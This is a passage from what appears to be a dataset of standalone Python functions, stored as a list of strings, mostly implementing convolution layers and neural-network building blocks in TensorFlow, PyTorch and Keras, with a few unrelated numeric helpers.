time_conv_reshape(arr,window,stride):\n \n bat, steps, feat = arr.get_shape().as_list()\n r = tf.floormod((steps - window), stride)\n n = math.ceil((steps - window)/stride)\n \n def padder(n=n,r=r,feat=feat,steps=steps,bat=bat,arr=arr):\n \"\"\"Pad function.\"\"\"\n pad = tf.zeros([bat, stride - r, feat],tf.float32)\n return tf.concat([arr, pad], 1) \n \n arr = tf.cond(tf.equal(r,0), lambda: arr, padder)\n steps = tf.cond(tf.equal(r,0), lambda: steps, lambda: steps + stride -r)\n last_step = steps - window + 1 \n \n def c(i,a,b):\n \"\"\"Condition tf.while_loop\"\"\"\n return tf.less(i,window)\n \n def b(i,new_arr,arr):\n \"\"\"Body tf.while_loop. Appends ith value of windows to new_arr.\"\"\"\n new_arr = tf.concat([new_arr,arr[:, i:last_step + i:stride, :]], axis=2)\n return i+1,new_arr,arr\n \n i = tf.constant(1)\n new_arr = arr[:, 0: last_step: stride, :]\n new_arr.set_shape([bat,n+1,None])\n _,new_arr,_=tf.while_loop(c,\n b,\n loop_vars=[i,new_arr,arr],\n shape_invariants=[i.get_shape(),\n tf.TensorShape([bat,n+1,None]),\n arr.get_shape(),\n ],\n )\n new_arr.set_shape([bat,n+1,feat*window])\n return new_arr", "def runlength(block, color_component, prev_dc_0, prev_dc_1, prev_dc_2):\n output = []\n accumulator = []\n flag = 0\n zero_count = 0\n\n for i in range(64):\n if i == 0:\n if (color_component == 1) or (color_component == 0):\n accumulator.append(block[i] - prev_dc_0)\n output.append(0)\n prev_dc_0 = block[i]\n\n elif color_component == 2:\n accumulator.append(block[i] - prev_dc_1)\n output.append(0)\n prev_dc_1 = block[i]\n\n elif color_component == 3:\n accumulator.append(block[i] - prev_dc_2)\n output.append(0)\n prev_dc_2 = block[i]\n else:\n pass\n else:\n if block[i] == 0:\n zero_count = zero_count + 1\n else:\n if zero_count <= 15:\n output.append(zero_count)\n accumulator.append(block[i])\n zero_count = 0\n else:\n accumulator.append(0)\n output.append(15)\n data = block[i]\n zero_count = zero_count - 15\n flag = 1\n\n while flag == 1:\n if zero_count <= 15:\n accumulator.append(data)\n output.append(zero_count)\n zero_count = 0\n flag = 0\n else:\n accumulator.append(0)\n output.append(15)\n zero_count = zero_count - 15\n\n if i == 63:\n if zero_count != 0:\n accumulator.append(0)\n output.append(0)\n\n return (output, accumulator, prev_dc_0, prev_dc_1, prev_dc_2)", "def conv_block(\r\n in_channels,\r\n out_channels,\r\n kernel_size,\r\n stride,\r\n dilation=1,\r\n):\r\n pad_mode = 'same'\r\n padding = 0\r\n\r\n dbl = nn.SequentialCell(\r\n [\r\n nn.Conv2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=kernel_size,\r\n stride=stride,\r\n padding=padding,\r\n dilation=dilation,\r\n pad_mode=pad_mode,\r\n ),\r\n nn.BatchNorm2d(out_channels, momentum=0.1),\r\n nn.ReLU(),\r\n ]\r\n )\r\n init_cov(dbl[0])\r\n init_bn(dbl[1])\r\n return dbl", "def conv(n_inputs, n_filters, kernel_size=3, stride=1, bias=False) -> torch.nn.Conv2d:\n return nn.Conv2d(n_inputs, n_filters,\n kernel_size=kernel_size, stride=stride,\n padding=kernel_size//2, bias=bias)", "def _compute_carry_and_output(self, x, h_tm1, c_tm1):\n x_i, x_f, x_c, x_o = x\n h_tm1_i, h_tm1_f, h_tm1_c, h_tm1_o = h_tm1\n i = self.recurrent_activation(\n x_i + K.dot(h_tm1_i, self.recurrent_kernel[:, :self.units]))\n f = self.recurrent_activation(x_f + K.dot(\n h_tm1_f, self.recurrent_kernel[:, self.units:self.units * 2]))\n c = f * c_tm1 + i * self.activation(x_c + K.dot(\n h_tm1_c, self.recurrent_kernel[:, self.units * 2:self.units * 3]))\n o = self.recurrent_activation(\n x_o + K.dot(h_tm1_o, self.recurrent_kernel[:, self.units * 3:]))\n return c, o", "def conv2d(x, *args, **kwargs):\n i = 0\n out = []\n batch_size = 10000\n while i < x.size(0): \n out.append(F.conv2d(x[i:min(i+batch_size, x.size(0))], *args, **kwargs))\n i += batch_size\n return torch.cat(out, 0)", "def forward(self, x):\n conv_output = self.conv1(x)\n\n # The window size of max pooling layer of CNN depends on the dimension of conv1d output.\n # Since padding size is 1 and kernal size is 5, so the output of conv1d is with dimension\n # length_of_input_sequence - 2 + 5 - 1 = length_of_input_sequence - 2\n x_conv = F.max_pool1d(F.relu(conv_output), x.size()[-1] - 2)\n return x_conv", "def calculate_timestep(self, control_inputs):\r\n rcs_disp = [0, 0]\r\n if control_inputs[4]:\r\n if control_inputs[0]: rcs_disp[0] += 1\r\n if control_inputs[1]: rcs_disp[0] -= 1\r\n if control_inputs[2]: rcs_disp[1] += 1\r\n if control_inputs[3]: rcs_disp[1] -= 1\r\n else:\r\n if control_inputs[0]:\r\n self.delta_v += self.accel*0.1\r\n self.thrust_angle = self.heading\r\n if control_inputs[1]:\r\n self.delta_v -= self.accel*0.1\r\n self.thrust_angle = self.heading\r\n if control_inputs[3]: self.delta_omega += self.accel*0.1\r\n if control_inputs[2]: self.delta_omega -= self.accel*0.1\r\n if control_inputs[5]:\r\n self.delta_omega *= 0.5\r\n self.delta_v *= 0.5\r\n if control_inputs[0] == False and control_inputs[1] == False:\r\n self.delta_v = 0\r\n if control_inputs[3] == False and control_inputs[2] == False:\r\n self.delta_omega = 0\r\n \r\n self.vel += self.delta_v\r\n self.omega += self.delta_omega\r\n if self.vel > 5: self.vel = 5\r\n if self.vel < -5: self.vel = -5\r\n if self.omega > 5: self.omega = 5\r\n if self.omega < -5: self.omega = -5\r\n if abs(self.vel) < 0.1: self.vel = 0\r\n if abs(self.omega) < 0.1: self.omega = 0\r\n if control_inputs[6]:\r\n self.vel = self.vel*0.9\r\n self.omega = self.omega*0.9\r\n self.heading += self.omega*self.time_step\r\n self.position[0] += (\r\n self.vel*self.time_step*cos(-radians(self.thrust_angle))\r\n + rcs_disp[0]*cos(-radians(self.heading))\r\n - rcs_disp[1]*sin(-radians(self.heading)))\r\n self.position[1] += (\r\n self.vel*self.time_step*sin(-radians(self.thrust_angle))\r\n + rcs_disp[0]*sin(-radians(self.heading))\r\n -rcs_disp[1]*cos(-radians(self.heading)))\r\n return self.position, self.vel, self.heading, self.omega, self.thrust_angle", "def conv2d_reduce_sum(x, input_height, input_width, padding, strides):\n # Sum over the output channels.\n lam_sum = tf.reduce_sum(x, axis=4)\n\n num_classes = x.shape[0].value\n batch_size = tf.shape(x)[1]\n kernel_height = x.shape[5].value\n kernel_width = x.shape[6].value\n input_channels = x.shape[7].value\n\n # Temporarily combine the (num_classes, batch_size, in_layer_channels) dims\n # while applying a transpose convolution.\n # Also combine (kernel_height, kernel_width), using them as the channels\n # as we'll apply the transpose convolution to each kernel point separately.\n lam_squeezed = tf.transpose(lam_sum, perm=[0, 1, 6, 2, 3, 4, 5])\n lam_squeezed = tf.reshape(lam_squeezed, shape=(\n [num_classes * batch_size * input_channels] +\n x.shape[2:4].as_list() +\n [kernel_height * kernel_width]))\n\n # De-convolve each elementary (i.e. one-hot) filter with the corresponding\n # slice of lambda.\n diagonal_kernel = tf.reshape(\n tf.eye(kernel_height * kernel_width, dtype=x.dtype),\n shape=[kernel_height, kernel_width, 1, kernel_height * kernel_width])\n lam_deconv = tf.nn.conv2d_transpose(\n lam_squeezed, diagonal_kernel, output_shape=(\n [num_classes * batch_size * input_channels] +\n [input_height, input_width, 1]),\n padding=padding, strides=([1] + list(strides) + [1]))\n\n # The resulting de-convolution has shape\n # (num_classes*batch_size*in_layer_channels,\n # in_layer_height, in_layer_width, 1).\n # Make it match mu_in.\n result = tf.reshape(lam_deconv, shape=(\n [num_classes, batch_size, input_channels] +\n lam_deconv.shape[1:3].as_list()))\n return tf.transpose(result, perm=[0, 1, 3, 4, 2])", "def get_time_steps(org_input):\n flat_input = nest.flatten(org_input)\n flat_input = tuple(array_ops.transpose(input_, [1, 0, 2])\n for input_ in flat_input)\n input_shape = tuple(array_ops.shape(input_) for input_ in flat_input)\n time_steps = input_shape[0][0]\n\n return time_steps", "def calccfl(k, t, x):\n xstep = (max(x) - min(x)) / (len(x)-1)\n tstep = (max(t) - min(t)) / (len(t)-1)\n cfl = k*tstep/xstep**2\n return cfl", "def conv(self, inputs, filters, kernel_size, strides, padding='SAME', name='conv_layer'):\n input_channels = inputs[-1]\n kernel = tf.Variable(tf.random.truncated_normal(shape=[kernel_size, kernel_size, input_channels, filters]),\n dtype=tf.float32, name='kernel')\n bias = tf.Variable(tf.zeros(shape=[filters]), name='bias')\n conv = tf.nn.conv2d(inputs, filter=kernel,\n strides=[1, strides, strides, 1],\n padding=padding, name='conv')\n out = tf.nn.relu(conv + bias, name='relu')\n return out", "def conv(x, filter_height, filter_width, num_filters, stride_y, stride_x, name,\n padding='SAME', trainable=True, log_weights=False):\n # Get number of input channels\n input_channels = int(x.get_shape()[-1])\n\n # Create lambda function for the convolution\n\n with tf.variable_scope(name) as scope:\n\n regularizer = tf.contrib.layers.l2_regularizer(scale=0.01)\n\n weights = tf.get_variable(name='weights',\n shape=[filter_height, filter_width,\n input_channels, num_filters],\n initializer=tf.glorot_uniform_initializer(),\n regularizer=regularizer,\n trainable=trainable)\n\n biases = tf.get_variable(name='biases',\n shape=[num_filters],\n initializer=tf.zeros_initializer(),\n trainable=trainable)\n\n out = tf.nn.conv2d(x, weights, strides=[1, stride_y, stride_x, 1],\n padding=padding)\n # Add biases\n out = tf.nn.bias_add(out, biases)\n\n # Apply relu function\n out = tf.nn.relu(out, name=scope.name)\n\n if log_weights == True:\n tf.summary.image('weights', weights[tf.newaxis,:,:,0,0,tf.newaxis])\n tf.summary.histogram('weights', weights)\n tf.summary.histogram('biases', biases)\n\n return out, weights, biases", "def conv2d(inputs, filters, kernel_size=3, strides=(1, 1)):\n return tf.layers.conv2d(\n inputs,\n filters,\n kernel_size,\n strides,\n padding=\"same\",\n activation=tf.nn.relu,\n bias_initializer=tf.initializers.constant(0.0),\n kernel_initializer=tf.keras.initializers.glorot_normal(),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(weight_decay))", "def inference_deep_pyramid_cnn(self):\n #1.region embedding\n embedding_documents=self.region_embedding() #shape:[batch_size,total_sequence_length,embedding_size]\n\n #2.two layers of convs\n embedding_documents = tf.expand_dims(embedding_documents ,-1) # [batch_size,total_sequence_length,embed_size,1). expand dimension so meet input requirement of 2d-conv\n conv=self.dpcnn_two_layers_conv(embedding_documents,double_num_filters=False) #shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n #skip connection: add and activation\n conv=conv+embedding_documents #shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n b = tf.get_variable(\"b-inference\", [self.hpcnn_number_filters])\n print(\"conv:\",conv,\";b:\",b)\n conv = tf.nn.relu(tf.nn.bias_add(conv, b),\"relu-inference\") #shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n\n #3. repeat of building blocks\n for i in range(self.num_repeat):\n conv=self.dpcnn_pooling_two_conv(conv,i) #shape:[batch_size,total_sequence_length/np.power(2,i),hpcnn_number_filters]\n\n #4. max pooling\n seq_length1=conv.get_shape().as_list()[1] #sequence length after multiple layers of conv and pooling\n seq_length2=conv.get_shape().as_list()[2] #sequence length after multiple layers of conv and pooling\n print(\"before.final.pooling:\",conv)\n pooling=tf.nn.max_pool(conv, ksize=[1,seq_length1,seq_length2,1], strides=[1,1,1,1], padding='VALID',name=\"pool\") #[batch_size,hpcnn_number_filters]\n pooling=tf.squeeze(pooling)\n print(\"pooling.final:\",pooling)\n\n #5. classifier\n\n return pooling", "def _explain_convolution(self, input, epsilon=0.005) -> torch.Tensor:\n model_info = self._derive_conv_info(self.model)\n\n input_conv = self._image_to_column(\n input,\n kernel_h=model_info[\"kernel_h\"],\n kernel_w=model_info[\"kernel_w\"],\n padding=model_info[\"padding\"],\n stride=model_info[\"stride\"],\n )\n\n start_layer_relevance = self._layerwise_relevance_propagation(\n self.model, input_conv, self.model(input)\n )\n\n start_layer_relevance = self._column_to_image(\n start_layer_relevance,\n input.size(),\n kernel_h=model_info[\"kernel_h\"],\n kernel_w=model_info[\"kernel_w\"],\n padding=model_info[\"padding\"],\n stride=model_info[\"stride\"],\n )\n\n return start_layer_relevance", "def _compute_total_covariance_matrix_states_time(self) -> tf.Tensor:\n aux_matrix = tf.matmul(self.b_matrix, tf.matmul(self.omega_matrix,\n self.b_matrix,\n transpose_b=True))\\\n + self.t_matrix\n total_covariance_matrix = self.total_c_phi\\\n + tf.matmul(self.s_matrix_inv,\n tf.matmul(aux_matrix, self.s_matrix_inv))\n return total_covariance_matrix", "def fftdeconvolve(image, kernel):\n x = numpy.fft.fftshift(numpy.fft.fftn(image))\n y = numpy.fft.fftshift(numpy.fft.fftn(kernel))\n\n return numpy.real(numpy.fft.fftshift(\n numpy.fft.ifftn(numpy.fft.ifftshift(x / y))))", "def dpcnn_two_layers_conv(self, inputs,double_num_filters=True):\n # conv1:\n # filter1's first three dimension apply to [total_sequence_length, embed_size, 1] of embedding_documents\n print(\"dpcnn_two_layers_conv.inputs:\", inputs) # (128, 400, 64, 250)\n channel = inputs.get_shape().as_list()[-1]\n if double_num_filters:\n hpcnn_number_filters =channel * 2\n else:\n hpcnn_number_filters=self.hpcnn_number_filters\n filter1 = tf.get_variable(\"filter1-%s\" % self.hpcnn_filter_size,[self.hpcnn_filter_size, 1, channel, hpcnn_number_filters],initializer=self.initializer)\n conv1 = tf.nn.conv2d(inputs, filter1, strides=[1, self.stride_length, 1, 1], padding=\"SAME\",name=\"conv\") # shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n conv1 = tf.contrib.layers.batch_norm(conv1, is_training=self.is_training_flag, scope='cnn1')\n\n print(\"dpcnn_two_layers_conv.conv1:\", conv1) # (128, 400, 64, 250)\n b1 = tf.get_variable(\"b-cnn-%s\" % hpcnn_number_filters, [hpcnn_number_filters])\n conv1 = tf.nn.relu(tf.nn.bias_add(conv1, b1),\"relu1\") # shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n\n # conv2\n # filter2's first three dimension apply to:[total_sequence_length,embed_size,hpcnn_number_filters] of conv1\n filter2 = tf.get_variable(\"filter2-%s\" % self.hpcnn_filter_size,[self.hpcnn_filter_size, 1, hpcnn_number_filters, hpcnn_number_filters],initializer=self.initializer)\n conv2 = tf.nn.conv2d(conv1, filter2, strides=[1, self.stride_length, 1, 1], padding=\"SAME\",name=\"conv2\") # shape:[batch_size,stotal_sequence_length,embed_size,hpcnn_number_filters]\n conv2 = tf.contrib.layers.batch_norm(conv2, is_training=self.is_training_flag, scope='cnn2')\n\n print(\"dpcnn_two_layers_conv.conv2:\", conv2) # (128, 400, 64, 250)\n return conv2 # shape:[batch_size,total_sequence_length,embed_size,num_filters]", "def td_conv_block(input_tensor, kernel_size, filters, stage, block, td_input_shape, strides=(2, 2), use_conv_bias=True,\n weight_regularizer=None, bias_regularizer=None, bn_training=False, separate_scale=False):\n filters1, filters2, filters3 = filters\n bn_axis = 3\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n scale_name_base = 'scale' + str(stage) + block + '_branch'\n eps = 1e-5\n\n x = TimeDistributed(Conv2D(filters1, (1, 1), strides=strides, use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer, bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '2a', input_shape=td_input_shape)(input_tensor)\n x = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '2a')(x, training=bn_training)\n if separate_scale:\n x = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training), name=scale_name_base + '2a')(x, training=bn_training)\n x = Activation('relu')(x)\n\n x = TimeDistributed(Conv2D(filters2, kernel_size, padding='same', use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer, bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '2b')(x)\n x = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '2b')(x, training=bn_training)\n if separate_scale:\n x = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training), name=scale_name_base + '2b')(x, training=bn_training)\n x = Activation('relu')(x)\n\n x = TimeDistributed(Conv2D(filters3, (1, 1), use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer,bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '2c')(x)\n x = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '2c')(x, training=bn_training)\n if separate_scale:\n x = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training), name=scale_name_base + '2c')(x, training=bn_training)\n\n shortcut = TimeDistributed(Conv2D(filters3, (1, 1), strides=strides, use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer, bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '1')(input_tensor)\n shortcut = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '1')(shortcut, training=bn_training)\n if separate_scale:\n shortcut = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training),\n name=scale_name_base + '1')(shortcut, training=bn_training)\n\n x = layers.add([x, shortcut])\n x = TimeDistributed(Activation('relu'))(x)\n return x", "def conv_to_fc_size(\n input_shape, conv_depth, pools,\n stride=[2, 2, 2], padding='SAME',\n dropout_keep_prob=1.0):\n h, w, d = input_shape\n if padding == 'SAME':\n for i in range(pools):\n h = math.ceil(float(h) / float(stride[0]))\n w = math.ceil(float(w) / float(stride[1]))\n d = math.ceil(float(d) / float(stride[2])) \n else:\n # 'VALID' padding\n pass\n \n return conv_depth * h * w * d", "def cortex_conv(inp, filters, n_out_w=None, n_out_h=None, \n strides=(1, 1, 1, 1), padding='SAME', bias=None):\n\n\n n_out = filters.get_shape()[3].value\n if n_out is None and (n_out_w is None or n_out_h is None):\n raise Exception(\"Filter shape not inferrable from filter tensor \"\n \"and output shape not inferrable from n_out_w and n_out_h.\")\n elif n_out is None:\n n_out = n_out_w * n_out_h\n\n if n_out_h is None:\n if n_out_w is None:\n sqrt = int(math.sqrt(n_out))\n n_out_w = sqrt\n n_out_h = n_out // n_out_w\n else:\n if n_out_w is None:\n n_out_w = n_out // n_out_h\n\n conv_raw = tf.nn.conv2d(inp, filters, strides=strides, padding=padding)\n if bias is not None:\n conv_raw = tf.nn.bias_add(conv_raw, bias)\n shp = [s.value for s in conv_raw.get_shape()]\n reshaped = tf.reshape(conv_raw[:, :, :, :n_out_w * n_out_h],\n (shp[0], shp[1], shp[2], n_out_h, n_out_w))\n transposed = tf.transpose(reshaped, (0, 1, 3, 2, 4))\n output = tf.reshape(transposed, (shp[0], shp[1] * n_out_h, shp[2] * n_out_w,\n 1))\n return output", "def __len__(self):\n num_x, num_y = self.conv_dims()\n return num_x * num_y", "def forward(self, inputs):\n # inputs is (batch, slen)\n x = self.embed(inputs) # x is (batch, seq, dim_e)\n x = x.transpose(1, 2) # x is (batch, dim_e, slen)\n # because conv1d requires (batch, channels_in=dim_e, slen)\n # to produce an output (batch, channels_out, slen - k + 1)\n # we then pool1d (kernel=slen-k) over the output of conv1d\n # since 1d works along time (i.e. sequence) this means\n # we get (batch, channels_out=cshannels_outs_k, 1) which we squeeze\n conv_blocks_out = [self.conv_blocks[n](x).squeeze(-1)\n for n in range(self.nk)]\n # and finally we concatenate all our conv1ds with different kernel\n # sizes together to get (batch, sum_k(channels_outs_k))\n # i.e. we concat the channels_out (i.e. featutres)\n x = torch.cat(conv_blocks_out, dim=1)\n\n # and do some dropout\n x = self.dropout(x)\n\n # squeeze into hidden\n if self.hidden_size > 0:\n x = self.fc(x)\n x = self.dropout2(x)\n x = self.fc_act(x)\n\n # map to classes and return\n x = self.output(x)\n return x", "def lac(X, conts, k, nsteps=30, window_size=1):\n dim = len(conts)\n\n #np.random.seed(42)\n # Initialize parameters\n priors = np.ones(k) / k\n\n\n import sys; sys.stdout.flush()\n if X is not None:\n means, covars = initialize_sample_kmeans(X, k)\n else:\n means, covars = initialize_random(conts, k)\n\n #means, covars = initialize_kmeans(conts, k)\n\n w = [np.empty((k, len(c[0]),)) for c in conts]\n\n\n for i in range(1, nsteps + 1):\n for l, (c, cw) in enumerate(conts):\n lower = l - window_size if l - window_size >= 0 else None\n upper = l + window_size + 1 if l + window_size + 1 <= dim else None\n dims = slice(lower, upper)\n active_dim = min(l, window_size)\n\n x = c\n\n # E step\n for j in range(k):\n if any(np.abs(covars[j, dims]) < 1e-15):\n assert False, 'covars should be fixed'\n\n det = covars[j, dims].prod()\n inv_covars = 1. / covars[j, dims]\n xn = x - means[j, dims]\n factor = (2.0 * np.pi) ** (x.shape[1]/ 2.0) * det ** 0.5\n w[l][j] = priors[j] * np.exp(np.sum(xn * inv_covars * xn, axis=1) * -.5) / factor\n wsum = w[l].sum(axis=0)\n wsum[wsum == 0] = 1.\n w[l] /= wsum\n\n # M step\n n = np.sum(w[l], axis=1)\n priors = n / np.sum(n)\n for j in range(k):\n if n[j]:\n mu = np.dot(w[l][j, :] * cw, x[:, active_dim]) / (w[l][j, :] * cw).sum()\n\n xn = x[:, active_dim] - mu\n sigma = np.sum(xn ** 2 * w[l][j] * cw, axis=0) / (w[l][j, :] * cw).sum()\n sigma = sigma if sigma > 1e-3 else 1e-3\n\n if np.isnan(mu).any() or np.isnan(sigma).any():\n return w, means, covars, priors\n else:\n mu = means[j, l]\n sigma = MIN_COVARIANCE\n means[j, l] = mu\n covars[j, l] = sigma\n\n # w = np.zeros((k, m))\n # for j in range(k):\n # if active[j]:\n # det = covars[j].prod()\n # inv_covars = 1. / covars[j]\n # xn = X - means[j]\n # factor = (2.0 * np.pi) ** (xn.shape[1] / 2.0) * det ** 0.5\n # w[j] = priors[j] * exp(-.5 * np.sum(xn * inv_covars * xn, axis=1)) / factor\n # w[active] /= w[active].sum(axis=0)\n\n return w, means, covars, priors", "def TCN_V1(\n n_classes, \n feat_dim,\n max_len,\n gap=1,\n dropout=0.0,\n activation=\"relu\"):\n\n ROW_AXIS = 1\n CHANNEL_AXIS = 2\n \n initial_conv_len = 8\n initial_conv_num = 64\n\n config = [ \n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(2,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(2,8,256)],\n [(1,8,256)],\n [(1,8,256)],\n ]\n\n input = Input(shape=(max_len,feat_dim))\n model = input\n\n model = Convolution1D(initial_conv_num, \n initial_conv_len,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=1)(model)\n\n for depth in range(0,len(config)):\n blocks = []\n for stride,filter_dim,num in config[depth]:\n ## residual block\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n relu = Activation(activation)(bn)\n dr = Dropout(dropout)(relu)\n conv = Convolution1D(num, \n filter_dim,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=stride)(dr)\n\n ## potential downsample\n conv_shape = K.int_shape(conv)\n model_shape = K.int_shape(model)\n if conv_shape[CHANNEL_AXIS] != model_shape[CHANNEL_AXIS]:\n model = Convolution1D(num, \n 1,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=2)(model)\n\n ## merge block\n model = merge([model,conv],mode='sum',concat_axis=CHANNEL_AXIS)\n\n ## final bn+relu\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n model = Activation(activation)(bn)\n\n\n if gap:\n pool_window_shape = K.int_shape(model)\n gap = AveragePooling1D(pool_window_shape[ROW_AXIS],\n stride=1)(model)\n flatten = Flatten()(gap)\n else:\n flatten = Flatten()(model)\n\n dense = Dense(output_dim=n_classes,\n init=\"he_normal\",\n activation=\"softmax\")(flatten)\n\n model = Model(input=input, output=dense)\n # optimizer = SGD(lr=0.01, momentum=0.9, decay=0.0, nesterov=True) \n # model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])\n return model", "def convolve_im(im: np.array,\n kernel: np.array,\n verbose=True):\n\t\n ### START YOUR CODE HERE ### (You can change anything inside this block) \n\t\n H,W = np.shape(im)\n h,w = np.shape(kernel)\n t_b = (H-h)//2\n l_r = (W-w)//2\n kernel_padded = np.pad(kernel, ((t_b, t_b+1),(l_r, l_r+1)), 'constant')\n kernel_padded = np.pad(kernel, ((0, 2*t_b),(0, 2*l_r)), 'constant')\n fft_kernel = np.fft.fft2(kernel_padded, s=None, axes=(-2, -1), norm=None)\n \n \n im_fft = np.fft.fft2(im, s=None, axes=(-2, -1), norm=None) \n im_filt = im_fft*fft_kernel \n conv_result = np.fft.ifft2(im_filt, s=None, axes=(-2, -1), norm=None).real \n\n if verbose:\n # Use plt.subplot to place two or more images beside eachother\n plt.figure(figsize=(12, 4))\n # plt.subplot(num_rows, num_cols, position (1-indexed))\n plt.subplot(1, 2, 1)\n plt.imshow(im, cmap=\"gray\")\n plt.subplot(1, 2, 2) \n plt.imshow(conv_result, cmap=\"gray\")\n\n ### END YOUR CODE HERE ###\n return conv_result", "def __call__(self, x):\n x_shape = x.get_shape().as_list()\n batch_size = tf.shape(x)[0]\n stride_x, stride_y = self.stride[1], self.stride[2]\n output_shape = tf.stack([\n batch_size, x_shape[1] * stride_x, x_shape[2] * stride_y, self.nc_out])\n y = tf.nn.conv2d_transpose(\n x, filter=self._weight, output_shape=output_shape, strides=self.stride,\n padding=self.padding)\n return self._pre_scale * y + self._bias", "def one_hot_add_tf(inputs, shift):\n # Compute circular 1-D convolution with shift as the kernel.\n inputs = tf.cast(inputs, tf.complex64)\n shift = tf.cast(shift, tf.complex64)\n inputs_fft = tf.signal.fft(inputs)\n shift_fft = tf.signal.fft(shift)\n result_fft = inputs_fft * shift_fft\n return tf.math.real(tf.signal.ifft(result_fft)), result_fft, inputs_fft, shift_fft", "def test_conv2d():\n img = np.array([\n [0.3, 0.5, 0.7, 0.9],\n [0.1, 0.3, 0.5, 0.7],\n [0.9, 0.7, 0.5, 0.3],\n ])\n template = np.array([\n [1, 0],\n [1, 0],\n ])\n template = np.flipud(np.fliplr(template))\n return fftconvolve(img, template, mode='valid')", "def TCN_V3(\n n_classes, \n feat_dim,\n max_len,\n gap=1,\n dropout=0.0,\n activation=\"relu\"):\n\n ROW_AXIS = 1\n CHANNEL_AXIS = 2\n \n initial_conv_len = 8\n initial_conv_num = 128\n\n config = [ \n [(1,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(2,8,256)],\n [(1,8,256)],\n [(1,8,256)],\n ]\n\n input = Input(shape=(max_len,feat_dim))\n model = input\n\n model = Convolution1D(initial_conv_num, \n initial_conv_len,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=1)(model)\n\n for depth in range(0,len(config)):\n blocks = []\n for stride,filter_dim,num in config[depth]:\n ## residual block\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n relu = Activation(activation)(bn)\n dr = Dropout(dropout)(relu)\n conv = Convolution1D(num, \n filter_dim,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=stride)(dr)\n #dr = Dropout(dropout)(conv)\n\n\n ## potential downsample\n conv_shape = K.int_shape(conv)\n model_shape = K.int_shape(model)\n if conv_shape[CHANNEL_AXIS] != model_shape[CHANNEL_AXIS]:\n model = Convolution1D(num, \n 1,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=2)(model)\n\n ## merge block\n model = merge([model,conv],mode='sum',concat_axis=CHANNEL_AXIS)\n\n ## final bn+relu\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n model = Activation(activation)(bn)\n\n\n if gap:\n pool_window_shape = K.int_shape(model)\n gap = AveragePooling1D(pool_window_shape[ROW_AXIS],\n stride=1)(model)\n flatten = Flatten()(gap)\n else:\n flatten = Flatten()(model)\n\n dense = Dense(output_dim=n_classes,\n init=\"he_normal\",\n activation=\"softmax\")(flatten)\n\n model = Model(input=input, output=dense)\n # optimizer = SGD(lr=0.01, momentum=0.9, decay=0.0, nesterov=True) \n # model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])\n return model", "def convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n m, h, w, c = images.shape\n KernelHeight, kernelWidth, c = kernel.shape\n StrideHeight, StrideWidth = stride\n\n if padding == 'valid':\n PaddingHeight = 0\n PaddingWidth = 0\n elif padding == 'same':\n PaddingHeight = int(\n (((h - 1) * StrideHeight + KernelHeight - h) / 2) + 1)\n PaddingWidth = int((((w - 1) * StrideWidth + kernelWidth - w) / 2) + 1)\n else:\n PaddingHeight, PaddingWidth = padding\n\n OutputH = int(((h + 2 * PaddingHeight - KernelHeight) / StrideHeight) + 1)\n OutputW = int(((w + 2 * PaddingWidth - kernelWidth) / StrideWidth) + 1)\n\n ImagePadded = np.pad(\n images,\n ((0, 0), (PaddingHeight, PaddingHeight),\n (PaddingWidth, PaddingWidth), (0, 0)),\n 'constant'\n )\n\n output = np.zeros((m, OutputH, OutputW))\n ImageRange = np.arange(m)\n\n for i_OutputH in range(OutputH):\n for i_OutputW in range(OutputW):\n s_i_OutputH = i_OutputH * StrideHeight\n s_i_OutputW = i_OutputW * StrideWidth\n flt = ImagePadded[ImageRange,\n s_i_OutputH:KernelHeight + s_i_OutputH,\n s_i_OutputW:kernelWidth + s_i_OutputW,\n :]\n output[ImageRange, i_OutputH, i_OutputW] = np.sum(\n flt * kernel, axis=(1, 2, 3))\n return output", "def convolution(x, kernel, padding, strides):\n # Temporarily combine the classes/batch dimensions while convolving.\n num_classes = x.shape[0].value\n batch_size = tf.shape(x)[1]\n x_squeezed = tf.reshape(x, shape=([num_classes * batch_size] +\n x.shape[2:].as_list()))\n if len(kernel.shape) == 4:\n y = 